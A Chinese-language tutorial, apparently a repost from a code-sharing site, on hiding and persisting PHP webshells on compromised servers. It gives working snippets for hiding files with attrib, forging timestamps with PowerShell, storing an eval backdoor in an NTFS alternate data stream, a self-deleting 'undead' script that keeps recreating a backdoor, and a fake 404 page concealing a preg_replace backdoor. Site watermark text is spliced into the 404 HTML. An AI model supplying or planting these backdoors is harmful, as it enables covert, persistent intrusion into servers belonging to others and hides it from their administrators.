前言
如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。
1、隐藏文件
使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。
attrib +s +a +h +r shell.php //隐藏shell.php文件
2、修改文件时间属性
当你试图在一堆文件中隐藏自己新创建的文件,那么,除了创建一个迷惑性的文件名,还需要修改文件的修改日期。
//修改时间修改 Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12" //访问时间修改 Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12" //创建时间修改 Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"
使用命令获取文件属性
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
修改某个文件夹下所有文件的创建和修改时间
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"
3、利用ADS隐藏文件内容
在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。
利用include函数,将index.php:hidden.jpg进行hex编码,把这个ADS文件include进去,这样子就可以正常解析我们的一句话了。
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>
4、不死马
不死马会删除自身,以进程的形式循环创建隐蔽的后门。
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__); //删除自身
while(1)
{
file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //创建shell.php,这里最好用免杀的一句话
sleep(10); //间隔时间
}
?>
处理方式最简单有效的办法,就是重启服务就可以删除webshell文件。
5、中间件后门
将编译好的so文件复制到modules文件夹,启动后门模块,重启Apache。当发送特定参数的字符串过去时,即可触发后门。
github项目地址:
6、利用404页面隐藏后门
404页面主要用来提升用户体验,可用来隐藏后门文件。
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h<p style="color:transparent">本文来源gao!%daima.com搞$代*!码$网3</p><strong>搞代gaodaima码</strong>1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
搞代码网(gaodaima.com)提供的所有资源部分来自互联网,如果有侵犯您的版权或其他权益,请说明详细缘由并提供版权或权益证明然后发送到邮箱[email protected],我们会在看到邮件的第一时间内为您处理,或直接联系QQ:872152909。本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:PHP后门隐藏的一些技巧总结
转载请注明原文链接:PHP后门隐藏的一些技巧总结
